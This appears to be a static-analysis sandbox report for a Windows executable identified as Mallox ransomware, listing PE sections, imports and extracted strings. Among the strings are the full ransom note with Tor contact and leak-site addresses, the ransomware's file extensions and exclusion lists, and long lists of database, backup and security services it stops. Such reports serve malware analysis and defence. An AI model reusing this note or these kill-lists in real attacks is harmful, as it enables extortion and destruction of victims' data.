Static | ZeroBOX

PE Compile Time

2024-05-19 16:31:19

PE Imphash

cbe53f46121d600d26965890ee97a94a

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text   0x00001000       0x000515e0    0x00051600        6.57115153746
.rdata  0x00053000       0x0001f2a6    0x0001f400        5.06107389301
.data   0x00073000       0x00008644    0x00001c00        3.49245907942
.pdata  0x0007c000       0x00003b28    0x00003c00        5.67516630402
_RDATA  0x00080000       0x000001f4    0x00000200        4.20448280159
.reloc  0x00081000       0x0000102c    0x00001200        5.22457265682

Imports

Library KERNEL32.dll:
0x1400530f8 TerminateThread
0x140053100 LoadLibraryA
0x140053108 CloseHandle
0x140053110 GetNativeSystemInfo
0x140053118 CreateThread
0x140053120 SetVolumeMountPointW
0x140053128 GetProcAddress
0x140053130 LocalFree
0x140053138 DeleteCriticalSection
0x140053140 ExitProcess
0x140053148 GetCurrentProcessId
0x140053150 GetModuleHandleW
0x140053158 CopyFileW
0x140053168 lstrcpyW
0x140053170 SleepEx
0x140053178 GetDiskFreeSpaceExA
0x140053180 CreateEventA
0x140053188 FindNextVolumeW
0x140053190 lstrcmpiW
0x140053198 CreateIoCompletionPort
0x1400531a0 GetTickCount
0x1400531a8 lstrcmpW
0x1400531b0 GetDriveTypeW
0x1400531b8 GetComputerNameA
0x1400531c0 TerminateProcess
0x1400531c8 OpenProcess
0x1400531d0 CreateToolhelp32Snapshot
0x1400531d8 Process32NextW
0x1400531e0 QueryDosDeviceW
0x1400531f0 K32GetModuleFileNameExW
0x1400531f8 DuplicateHandle
0x140053200 CreateEventW
0x140053208 GetWindowsDirectoryW
0x140053210 FindVolumeClose
0x140053218 GetFileType
0x140053220 GetTickCount64
0x140053228 GetCurrentThread
0x140053230 GetSystemTimeAsFileTime
0x140053238 ReadFile
0x140053240 GetFileSizeEx
0x140053248 SetEndOfFile
0x140053250 SetFileAttributesW
0x140053258 SetFilePointerEx
0x140053260 SleepConditionVariableCS
0x140053268 WakeConditionVariable
0x140053278 GetSystemInfo
0x140053280 GlobalMemoryStatusEx
0x140053288 WriteConsoleW
0x140053290 ReadConsoleW
0x140053298 HeapSize
0x1400532a0 GetConsoleMode
0x1400532a8 GetConsoleOutputCP
0x1400532b0 FlushFileBuffers
0x1400532b8 GetDiskFreeSpaceExW
0x1400532c0 SetEvent
0x1400532c8 GetLastError
0x1400532d0 Sleep
0x1400532d8 MultiByteToWideChar
0x1400532e8 GetLocaleInfoA
0x1400532f0 GetModuleHandleA
0x1400532f8 GetCurrentThreadId
0x140053300 GetFileAttributesW
0x140053308 CreateFileW
0x140053310 WaitForSingleObject
0x140053318 FindClose
0x140053320 lstrlenA
0x140053330 SetErrorMode
0x140053340 LeaveCriticalSection
0x140053348 WaitForMultipleObjects
0x140053350 GetModuleFileNameW
0x140053358 GetUserDefaultLangID
0x140053360 WriteFile
0x140053368 lstrlenW
0x140053370 GetCurrentProcess
0x140053378 FindNextFileW
0x140053380 GetCommandLineW
0x140053388 EnterCriticalSection
0x140053390 FindFirstVolumeW
0x140053398 FindFirstFileExW
0x1400533a0 GetLogicalDrives
0x1400533a8 MoveFileW
0x1400533b0 OutputDebugStringW
0x1400533b8 SetStdHandle
0x1400533c0 GetProcessHeap
0x1400533c8 FreeEnvironmentStringsW
0x1400533d0 GetEnvironmentStringsW
0x1400533d8 GetCommandLineA
0x1400533e0 GetOEMCP
0x1400533e8 GetACP
0x1400533f0 IsValidCodePage
0x1400533f8 EnumSystemLocalesW
0x140053400 GetUserDefaultLCID
0x140053408 IsValidLocale
0x140053410 GetLocaleInfoW
0x140053418 LCMapStringW
0x140053420 FlsFree
0x140053428 QueryPerformanceCounter
0x140053430 lstrcatW
0x140053438 FlsSetValue
0x140053440 FlsGetValue
0x140053448 FlsAlloc
0x140053450 HeapAlloc
0x140053458 HeapFree
0x140053460 HeapReAlloc
0x140053468 GetStdHandle
0x140053470 GetModuleHandleExW
0x140053478 LoadLibraryExW
0x140053480 FreeLibrary
0x140053488 TlsFree
0x140053490 TlsSetValue
0x140053498 RtlCaptureContext
0x1400534a0 RtlLookupFunctionEntry
0x1400534a8 RtlVirtualUnwind
0x1400534b0 UnhandledExceptionFilter
0x1400534c8 ReleaseSRWLockExclusive
0x1400534d0 AcquireSRWLockExclusive
0x1400534d8 WakeAllConditionVariable
0x1400534e8 IsDebuggerPresent
0x1400534f0 GetStartupInfoW
0x1400534f8 InitializeSListHead
0x140053500 GetStringTypeW
0x140053508 WideCharToMultiByte
0x140053518 EncodePointer
0x140053520 DecodePointer
0x140053528 LCMapStringEx
0x140053530 GetCPInfo
0x140053538 RtlUnwindEx
0x140053540 RtlPcToFileHeader
0x140053548 RaiseException
0x140053550 SetLastError
0x140053560 TlsAlloc
0x140053568 TlsGetValue
Library USER32.dll:
0x1400535f8 DefWindowProcW
0x140053600 GetCursorPos
0x140053608 CreateWindowExW
0x140053610 RegisterClassW
0x140053618 MessageBoxW
Library ADVAPI32.dll:
0x140053000 OpenServiceW
0x140053008 CryptReleaseContext
0x140053010 OpenThreadToken
0x140053018 AllocateAndInitializeSid
0x140053020 SetEntriesInAclW
0x140053028 SetNamedSecurityInfoW
0x140053030 FreeSid
0x140053038 ControlService
0x140053040 EnumDependentServicesW
0x140053048 QueryServiceConfigW
0x140053050 ChangeServiceConfigW
0x140053058 EnumServicesStatusW
0x140053060 QueryServiceStatusEx
0x140053068 LookupPrivilegeValueW
0x140053070 AdjustTokenPrivileges
0x140053078 CreateServiceW
0x140053080 RegCloseKey
0x140053088 CryptAcquireContextW
0x140053090 CloseServiceHandle
0x140053098 RegQueryValueExA
0x1400530a0 CryptGenRandom
0x1400530a8 OpenSCManagerW
0x1400530b0 RegSetValueExW
0x1400530b8 OpenProcessToken
0x1400530c0 StartServiceW
0x1400530c8 RegOpenKeyExA
0x1400530d0 RegOpenKeyExW
0x1400530d8 GetTokenInformation
Library SHELL32.dll:
0x140053590 CommandLineToArgvW
0x140053598 ShellExecuteW
Library bcrypt.dll:
0x140053690 BCryptGenRandom
Library NETAPI32.dll:
0x140053578 NetShareEnum
0x140053580 NetApiBufferFree
Library SHLWAPI.dll:
0x1400535a8 wnsprintfA
0x1400535b0 StrCmpNIW
0x1400535b8 StrCmpNW
0x1400535c0 StrStrIW
0x1400535c8 PathFileExistsW
0x1400535d0 SHDeleteKeyW
0x1400535d8 UrlUnescapeA
0x1400535e0 UrlEscapeA
0x1400535e8 wnsprintfW
Library IPHLPAPI.DLL:
0x1400530e8 GetIpNetTable
Library WS2_32.dll:
0x140053680 inet_ntoa
Library WININET.dll:
0x140053628 InternetQueryOptionW
0x140053630 HttpOpenRequestW
0x140053638 InternetOpenW
0x140053640 InternetCloseHandle
0x140053648 InternetConnectW
0x140053650 InternetSetOptionW
0x140053658 HttpSendRequestW
0x140053660 InternetCrackUrlW
0x140053668 InternetReadFile

!This program cannot be run in DOS mode.
bad allocation
bad function call
success
address family not supported
address in use
address not available
already connected
argument list too long
argument out of domain
bad address
bad file descriptor
bad message
broken pipe
connection aborted
connection already in progress
connection refused
connection reset
cross device link
destination address required
device or resource busy
directory not empty
executable format error
file exists
file too large
filename too long
function not supported
host unreachable
identifier removed
illegal byte sequence
inappropriate io control operation
interrupted
invalid argument
invalid seek
io error
is a directory
message size
network down
network reset
network unreachable
no buffer space
no child process
no link
no lock available
no message available
no message
no protocol option
no space on device
no stream resources
no such device or address
no such device
no such file or directory
no such process
not a directory
not a socket
not a stream
not connected
not enough memory
not supported
operation canceled
operation in progress
operation not permitted
operation not supported
operation would block
owner dead
permission denied
protocol error
protocol not supported
read only file system
resource deadlock would occur
resource unavailable try again
result out of range
state not recoverable
stream timeout
text file busy
timed out
too many files open in system
too many files open
too many links
too many symbolic link levels
value too large
wrong protocol type
unknown error
0123456789abcdefghijklmnopqrstuvwxyz
0123456789abcdefghijklmnopqrstuvwxyz
bad exception
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__swift_3
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
(null)
CorExitProcess
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
AreFileApisANSI
CompareStringEx
EnumSystemLocalesEx
GetDateFormatEx
GetLocaleInfoEx
GetTimeFormatEx
GetUserDefaultLocaleName
IsValidLocaleName
LCMapStringEx
LCIDToLocaleName
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
_hypot
_nextafter
1#QNAN
1#SNAN
expand 32-byte k
Your data has been stolen and encrypted
We will delete the stolen data and help with the recovery of encrypted files after payment has been made
Do not try to change or restore files yourself, this will break them
We provide free decryption for any 3 files up to 3MB in size on our website
How to contact with us:
1) Download and install TOR browser by this link: https://www.torproject.org/download/
2) If TOR blocked in your country and you can't access to the link then use any VPN software
3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin
4) Copy your private ID in the input field. Your Private key: {id}
5) You will see chat, payment information and we can make free test decryption here
Our blog of leaked companies:
wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion
Ladies and Gentlemen of the class of '99: If I could offer you only one tip for the future, sunscreen would be it.
Any submission to the IETF intended by the Contributor for publication as all or part of an IETF Internet-Draft or RFC and any statement made within the context of an IETF activity is considered an "IETF Contribution". Such statements include oral statements in IETF sessions, as well as written and electronic communications made at any time or place, which are addressed to
bCryptographic Forum Research Group
'Twas brillig, and the slithy toves
Did gyre and gimble in the wabe:
All mimsy were the borogoves,
And the mome raths outgrabe.
#Now is t
Single block msg
abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq
message digest
abcdefghijklmnopqrstuvwxyz
abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789
12345678901234567890123456789012345678901234567890123456789012345678901234567890
message digest
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789
12345678901234567890123456789012345678901234567890123456789012345678901234567890
abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq
abcdefghbcdefghicdefghijdefghijkefghijklfghijklmghijklmnhijklmnoijklmnopjklmnopqklmnopqrlmnopqrsmnopqrstnopqrstu
Unknown exception
bad array new length
string too long
map/set too long
iostream
bad cast
bad locale name
ios_base::badbit set
ios_base::failbit set
ios_base::eofbit set
ProductName
SOFTWARE\Microsoft\Windows NT\CurrentVersion
%s %s, %s, %s, %s
0.%llu
&size_of_hdd=
&max_size_of_file=
&SystemInformation=
&TargetID=
%s|%s|%s|%d
89A72EF01
PowrProf.dll
PowerSetActiveScheme
NtQueryObject
ntdll.dll
user32.dll
ShutdownBlockReasonCreate
invalid string position
vector too long
iostream stream error
NtQuerySystemInformation
AES-128-ECB
AES-192-ECB
AES-256-ECB
AES-128-CBC
AES-192-CBC
AES-256-CBC
AES-128-CFB128
AES-192-CFB128
AES-256-CFB128
AES-128-OFB
AES-192-OFB
AES-256-OFB
AES-128-CTR
AES-192-CTR
AES-256-CTR
AES-128-XTS
AES-256-XTS
AES-128-GCM
AES-192-GCM
AES-256-GCM
AES-128-CCM
AES-192-CCM
AES-256-CCM
AES-128-CCM*-NO-TAG
AES-192-CCM*-NO-TAG
AES-256-CCM*-NO-TAG
CAMELLIA-128-ECB
CAMELLIA-192-ECB
CAMELLIA-256-ECB
CAMELLIA-128-CBC
CAMELLIA-192-CBC
CAMELLIA-256-CBC
CAMELLIA-128-CFB128
CAMELLIA-192-CFB128
CAMELLIA-256-CFB128
CAMELLIA-128-CTR
CAMELLIA-192-CTR
CAMELLIA-256-CTR
CAMELLIA-128-GCM
CAMELLIA-192-GCM
CAMELLIA-256-GCM
CAMELLIA-128-CCM
CAMELLIA-192-CCM
CAMELLIA-256-CCM
CAMELLIA-128-CCM*-NO-TAG
CAMELLIA-192-CCM*-NO-TAG
CAMELLIA-256-CCM*-NO-TAG
ARIA-128-ECB
ARIA-192-ECB
ARIA-256-ECB
ARIA-128-CBC
ARIA-192-CBC
ARIA-256-CBC
ARIA-128-CFB128
ARIA-192-CFB128
ARIA-256-CFB128
ARIA-128-CTR
ARIA-192-CTR
ARIA-256-CTR
ARIA-128-GCM
ARIA-192-GCM
ARIA-256-GCM
ARIA-128-CCM
ARIA-192-CCM
ARIA-256-CCM
ARIA-128-CCM*-NO-TAG
ARIA-192-CCM*-NO-TAG
ARIA-256-CCM*-NO-TAG
DES-ECB
DES-CBC
DES-EDE-ECB
DES-EDE-CBC
DES-EDE3-ECB
DES-EDE3-CBC
CHACHA20
CHACHA20-POLY1305
AES-128-KW
AES-192-KW
AES-256-KW
AES-128-KWP
AES-192-KWP
AES-256-KWP
RIPEMD160
SHA224
SHA256
SHA384
SHA512
SHA3-224
SHA3-256
SHA3-384
SHA3-512
.text$di
.text$mn
.text$mn$00
.text$mn$21
.text$x
.text$yd
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCC
.CRT$XCL
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XLA
.CRT$XLZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$00
.rdata$T
.rdata$r
.rdata$voltmd
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.tls$ZZZ
.xdata
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.data$rs
.pdata
_RDATA
lstrlenW
QueryPerformanceCounter
OutputDebugStringW
MoveFileW
GetLogicalDrives
FindFirstFileExW
FindFirstVolumeW
EnterCriticalSection
GetCommandLineW
FindNextFileW
GetCurrentProcess
WriteFile
GetUserDefaultLangID
GetModuleFileNameW
WaitForMultipleObjects
LeaveCriticalSection
InitializeCriticalSection
SetErrorMode
GetQueuedCompletionStatus
lstrlenA
FindClose
WaitForSingleObject
CreateFileW
GetFileAttributesW
GetCurrentThreadId
GetModuleHandleA
GetLocaleInfoA
PostQueuedCompletionStatus
MultiByteToWideChar
GetLastError
SetEvent
GetDiskFreeSpaceExW
GetCurrentThread
TerminateThread
LoadLibraryA
CloseHandle
GetNativeSystemInfo
CreateThread
SetVolumeMountPointW
GetProcAddress
LocalFree
DeleteCriticalSection
ExitProcess
GetCurrentProcessId
GetModuleHandleW
CopyFileW
GetVolumePathNamesForVolumeNameW
lstrcpyW
SleepEx
GetDiskFreeSpaceExA
CreateEventA
FindNextVolumeW
lstrcmpiW
CreateIoCompletionPort
GetTickCount
lstrcmpW
GetDriveTypeW
GetComputerNameA
TerminateProcess
OpenProcess
CreateToolhelp32Snapshot
Process32NextW
QueryDosDeviceW
GetFinalPathNameByHandleW
K32GetModuleFileNameExW
DuplicateHandle
CreateEventW
GetWindowsDirectoryW
FindVolumeClose
GetFileType
GetTickCount64
lstrcatW
GetSystemTimeAsFileTime
ReadFile
GetFileSizeEx
SetEndOfFile
SetFileAttributesW
SetFilePointerEx
SleepConditionVariableCS
WakeConditionVariable
InitializeConditionVariable
GetSystemInfo
GlobalMemoryStatusEx
KERNEL32.dll
GetCursorPos
RegisterClassW
CreateWindowExW
MessageBoxW
DefWindowProcW
USER32.dll
GetTokenInformation
CryptReleaseContext
OpenThreadToken
RegOpenKeyExW
RegOpenKeyExA
StartServiceW
OpenProcessToken
RegSetValueExW
OpenSCManagerW
CryptGenRandom
RegQueryValueExA
CloseServiceHandle
CryptAcquireContextW
RegCloseKey
CreateServiceW
AdjustTokenPrivileges
LookupPrivilegeValueW
QueryServiceStatusEx
EnumServicesStatusW
OpenServiceW
ChangeServiceConfigW
QueryServiceConfigW
EnumDependentServicesW
ControlService
FreeSid
SetNamedSecurityInfoW
SetEntriesInAclW
AllocateAndInitializeSid
ADVAPI32.dll
ShellExecuteW
CommandLineToArgvW
SHELL32.dll
BCryptGenRandom
bcrypt.dll
NetShareEnum
NetApiBufferFree
NETAPI32.dll
wnsprintfA
StrCmpNIW
StrCmpNW
StrStrIW
PathFileExistsW
wnsprintfW
UrlEscapeA
UrlUnescapeA
SHDeleteKeyW
SHLWAPI.dll
GetIpNetTable
IPHLPAPI.DLL
WS2_32.dll
HttpOpenRequestW
InternetQueryOptionW
InternetQueryDataAvailable
InternetOpenW
InternetCrackUrlW
HttpSendRequestW
InternetCloseHandle
InternetConnectW
InternetSetOptionW
InternetReadFile
WININET.dll
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsProcessorFeaturePresent
ReleaseSRWLockExclusive
AcquireSRWLockExclusive
WakeAllConditionVariable
SleepConditionVariableSRW
IsDebuggerPresent
GetStartupInfoW
InitializeSListHead
GetStringTypeW
WideCharToMultiByte
InitializeCriticalSectionEx
EncodePointer
DecodePointer
LCMapStringEx
GetCPInfo
RtlUnwindEx
RtlPcToFileHeader
RaiseException
SetLastError
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
LoadLibraryExW
GetModuleHandleExW
GetStdHandle
HeapReAlloc
HeapFree
HeapAlloc
FlsAlloc
FlsGetValue
FlsSetValue
FlsFree
LCMapStringW
GetLocaleInfoW
IsValidLocale
GetUserDefaultLCID
EnumSystemLocalesW
IsValidCodePage
GetACP
GetOEMCP
GetCommandLineA
GetEnvironmentStringsW
FreeEnvironmentStringsW
GetProcessHeap
SetStdHandle
FlushFileBuffers
GetConsoleOutputCP
GetConsoleMode
HeapSize
ReadConsoleW
WriteConsoleW
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
mallox
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVbad_function_call@std@@
.?AVbad_exception@std@@
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVbad_array_new_length@std@@
.?AVfailure@ios_base@std@@
.?AVruntime_error@std@@
.?AVsystem_error@std@@
.?AV<lambda_1>@?1??WinMain@@YAHPEAUHINSTANCE__@@0PEADH@Z@
.?AVbad_cast@std@@
.?AV_System_error@std@@
.?AV<lambda_3>@?1??request@InetSend@@QEAAPEAXPEB_W0PEAXKPEAK@Z@
.?AV<lambda_1>@?1??request@InetSend@@QEAAPEAXPEB_W0PEAXKPEAK@Z@
.?AV<lambda_2>@?1??request@InetSend@@QEAAPEAXPEB_W0PEAXKPEAK@Z@
.?AVtype_info@@
.?AV_Locimp@locale@std@@
.?AVCryptoWr@@
.?AVStatus@@
.?AVFileWrapper@@
.?AVEncrypt@@
.?AVFileObj@@
.?AV?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$basic_stringbuf@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@
.?AV?$_Func_impl_no_alloc@V<lambda_1>@?1??WinMain@@YAHPEAUHINSTANCE__@@0PEADH@Z@X$$V@std@@
.?AV?$basic_stringbuf@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AVios_base@std@@
.?AVerror_category@std@@
.?AV?$ctype@D@std@@
.?AV?$basic_iostream@DU?$char_traits@D@std@@@std@@
.?AV_Facet_base@std@@
.?AU_Crt_new_delete@std@@
.?AV?$_Iosb@H@std@@
.?AV_Iostream_error_category2@std@@
.?AV?$numpunct@D@std@@
.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@
.?AV?$basic_iostream@_WU?$char_traits@_W@std@@@std@@
.?AUctype_base@std@@
.?AV?$_Func_base@X$$V@std@@
.?AV?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@
.?AV?$basic_istream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ostream@_WU?$char_traits@_W@std@@@std@@
.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@
.?AVfacet@locale@std@@
.?AV?$basic_ios@_WU?$char_traits@_W@std@@@std@@
.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_istream@_WU?$char_traits@_W@std@@@std@@
.?AV?$ctype@_W@std@@
.?AV?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@
.?AV?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@
.?AVProcessKiller@@
.?AVserviceslist@@
.?AV?$_Func_impl_no_alloc@V<lambda_3>@?1??request@InetSend@@QEAAPEAXPEB_W0PEAXKPEAK@Z@X$$V@std@@
.?AV?$_Func_impl_no_alloc@V<lambda_2>@?1??request@InetSend@@QEAAPEAXPEB_W0PEAXKPEAK@Z@X$$V@std@@
.?AV?$_Func_impl_no_alloc@V<lambda_1>@?1??request@InetSend@@QEAAPEAXPEB_W0PEAXKPEAK@Z@X$$V@std@@
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
api-ms-
(null)
mscoree.dll
LC_ALL
LC_COLLATE
LC_CTYPE
LC_MONETARY
LC_NUMERIC
LC_TIME
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
api-ms-win-core-datetime-l1-1-1
api-ms-win-core-file-l1-2-4
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
kernelbase
api-ms-win-appmodel-runtime-l1-1-2
user32
ext-ms-
UTF-16LEUNICODE
american
american english
american-english
australian
belgian
canadian
chinese
chinese-hongkong
chinese-simplified
chinese-singapore
chinese-traditional
dutch-belgian
english-american
english-aus
english-belize
english-can
english-caribbean
english-ire
english-jamaica
english-nz
english-south africa
english-trinidad y tobago
english-uk
english-us
english-usa
french-belgian
french-canadian
french-luxembourg
french-swiss
german-austrian
german-lichtenstein
german-luxembourg
german-swiss
irish-english
italian-swiss
norwegian
norwegian-bokmal
norwegian-nynorsk
portuguese-brazilian
spanish-argentina
spanish-bolivia
spanish-chile
spanish-colombia
spanish-costa rica
spanish-dominican republic
spanish-ecuador
spanish-el salvador
spanish-guatemala
spanish-honduras
spanish-mexican
spanish-modern
spanish-nicaragua
spanish-panama
spanish-paraguay
spanish-peru
spanish-puerto rico
spanish-uruguay
spanish-venezuela
swedish-finland
america
britain
england
great britain
holland
hong-kong
new-zealand
pr china
pr-china
puerto-rico
slovak
south africa
south korea
south-africa
south-korea
trinidad & tobago
united-kingdom
united-states
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
gmsocache
$windows.~ws
system volume information
appdata
perflogs
programdata
google
application data
tor browser
$windows.~bt
mozilla
windows.old
Windows Microsoft.NET
WindowsPowerShell
Windows NT
Windows
Common Files
Microsoft Security Client
Internet Explorer
Reference
Assemblies
Windows Defender
Microsoft ASP.NET
Core Runtime
Package
Microsoft Help Viewer
Microsoft MPI
Windows Kits
Microsoft.NET
Windows Mail
Package Store
Microsoft Analysis Services
Windows Portable Devices
Windows Photo Viewer
Windows Sidebar
.msstyles
.avast
.mallox
.nomedia
.Globeimposter-Alpha865qqz
.diangcab
.theme
.diagcfg
.diagpkg
.deskthemepack
.themepack
.rmallox
desktop.ini
ntuser.dat
thumbs.db
iconcache.db
ntuser.ini
bootfont.bin
ntuser.dat.log
bootsect.bak
boot.ini
autorun.inf
debugLog.txt
TargetInfo.txt
sqlserv.exe
oracle.exe
ntdbsmgr.exe
sqlservr.exe
sqlwriter.exe
MsDtsSrvr.exe
msmdsrv.exe
ReportingServecesService.exe
fdhost.exe
fdlauncher.exe
mysql.exe
Small size: %s
SiebelApplicationContainer_Siebel_Home_d_Siebel_sai
ReportServer$SQLEXPRESS
SQL Server Reporting Services
SQL Server (MSSQLSERVER)
MSSQLFDLauncher
SQLSERVERAGENT
SQLBrowser
SQLTELEMETRY
MsDtsServer130
SSISTasdRY130
MSSQL$WOLTERSKLUWER
SQLAgent$PROGID
SQLWriter
MSSQL$VEEAMSQL2012
SQLAgent$VEEAMSQL2012
SQLAgent
MSSQLServerADHelper100
MSSQLServerOLAPService
MsDtsServer100
ReportServer
SQLTELEMETRY$HL
TMBMServer
MSSQL$PROGID
XT800Service_Personal
AHS SERVICE
Sense Shield Service
FontCache3.0.0.0
OSP Service
DAService_TCP
eCard-TTransServer
wanxiao-monitor
vm-agent
SyncBASE Service
Flash Helper Service
Kiwi Syslog Server
UWS HiPriv Services
UWS LoPriv Services
UtilDev Web Server Pro
ZTE USBIP Client Guard
ZTE USBIP Client
ZTE FileTranS
Zabbix Agent
EasyFZS Server
Rpc Monitor
Nuo Update Monitor
Daemon Service
FlexNet Licensing Service 64
U8WorkerService2
U8MPool
U8WebPool
U8WorkerService1
TongBackupSrv
cbVSCService11
CobianBackup11
MSSQLSERVER
MSSQL$
MSSQL$FE_EXPRESS
SQLANYs_Sage_FAS_Fixed_Assets
MSSQL$VIM_SQLEXP
QcSoftService
VMTools
VGAuthService
TeamViewer
RabbitMQ
SSMonitorService
SSSyncService
TPlusStdAppService1300
MSSQL$SQL2008
SQLAgent$SQL2008
TPlusStdTaskService1300
TPlusStdUpgradeService1300
VirboxWebServer
jhi_service
eCardMPService
EnergyDataService
UI0Detect
K3MobileService
TCPIDDAService
WebAttendServer
UIODetect
VMAuthdService
VMUSBArbService
VMwareHostd
VmAgentDaemon
OpenSSHd
eSightService
apachezt
Jenkins
secbizsrv
smtpsvrJT
zyb_sync
360EntHttpServer
360EntSvc
360EntClientSvc
NFWebServer
wampapache
MSSEARCH
msftesql
OracleDBConcoleorcl
OracleJobSchedulerORCL
OracleMTSRecoveryService
OracleOraDb11g_home1ClrAgent
OracleOraDb11g_home1TNSListener
OracleVssWriterORCL
OracleServiceORCL
aspnet_state
JhTask
ImeDictUpdateService
MCService
allpass_redisservice_port21160
ftnlsv3
ftnlses3
FxService
ftusbrdwks
ftusbrdsrv
wwbizsrv
qemu-ga
AlibabaProtect
ZTEVdservice
kbasesrv
MMRHookService
IpOverUsbSvc
KuaiYunTools
KMSELDI
btPanel
Protect_2345Explorer
2345PicSvc
vmware-converter-agent
vmware-converter-server
vmware-converter-worker
QQCertificateService
OracleRemExecService
GPSDaemon
GPSUserSvr
GPSDownSvr
GPSStorageSvr
GPSDataProcSvr
GPSGatewaySvr
GPSMediaSvr
GPSLoginSvr
GPSTomcat6
GPSMysqld
GPSFtpd
BackupExecAgentAccelerator
BackupExecDeviceMediaService
BackupExecRPCService
BackupExecAgentBrowser
BackupExecJobEngine
BackupExecManagementService
TxQBService
Gailun_Downloader
RemoteAssistService
YunService
Serv-U
OpenFastAssist
asComSvc
OfficeUpdateService
RtcSrv
RTCASMCU
MASTER
NscAuthService
MSCRMUnzipService
MSCRMAsyncService$maintenance
MSCRMAsyncService
REPLICA
RTCATS
RTCAVMCU
RtcQms
RTCMEETINGMCU
RTCIMMCU
RTCDATAMCU
RTCCDR
ProjectEventService16
ProjectQueueService16
SPAdminV4
SPSearchHostController
SPTimerV4
SPTraceV4
OSearch16
ProjectCalcService16
AppFabricCachingService
MotionBoard57
MotionBoardRCService57
vsvnjobsvc
VisualSVNServer
BestSyncSvc
LPManager
MediatekRegistryWriter
RaAutoInstSrv_RT2870
CobianBackup10
SQLANYs_sem5
CASLicenceServer
SQLService
semwebsrv
